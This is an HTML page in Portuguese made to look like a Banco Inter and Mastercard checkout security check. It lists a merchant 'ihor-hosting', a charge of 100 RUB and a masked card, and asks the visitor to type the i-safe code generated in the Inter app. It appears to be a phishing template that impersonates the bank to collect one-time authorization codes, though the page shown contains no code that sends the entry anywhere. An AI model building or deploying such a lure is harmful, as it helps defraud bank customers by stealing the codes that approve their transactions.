<!DOCTYPE html>
<html lang="pt-br">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Checkout | Inter</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link rel="stylesheet" href="assets/style.css">
</head>

<body>
    <section class="d-flex justify-content-center">

        <div class="card mt-5" style="width: 22rem;">
            <div class="card-body">
                <div class="d-flex justify-content-between p-2 pt-3">
                    <img width="120px" src="assets/img/logoMASTERCARD.jpg" alt="">
                    <img width="120px" src="assets/img/logo_inter.png" alt="">
                </div>
                <hr class="risc">
                <h6 class="d-flex justify-content-end step">Passo 1 de 2</h6>
                <h6 class="text-left titulo-box pt-2">
                    <b>Validação de Segurança</b>
                </h6>

                <div class="greyfound">
                    <ul class="list-group">
                        <li class="list-group-item"><b>Loja:</b> ihor-hosting</li>
                        <li class="list-group-item"><b>Valor:</b> 100,00 RUB</li>
                        <li class="list-group-item"><b>Cartão:</b> 2306 **** **** 9953</li>
                    </ul>
                </div>
                <h6 class="text-center titulo-box pt-3">
                    Para validar sua transação, abra o app Inter, clique no ícone do <b>i-safe</b> e digite o código gerado:
                </h6>
                <div class="input-group mb-3 p-2">
                    <div class="input-group-prepend">
                        <input type="password" class="pass-inter" placeholder="Digite o código">
                    </div>
                </div>
                <div class="d-flex justify-content-between m-3">
                    <button type="button" class="btn btn-success">Confirmar</button>
                    <button type="button" class="btn btn-success">Cancelar</button>
                    <button type="button" class="btn btn-success">Ajuda</button>
                </div>
            </div>
        </div>
    </section>
</body>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js"></script>

</html>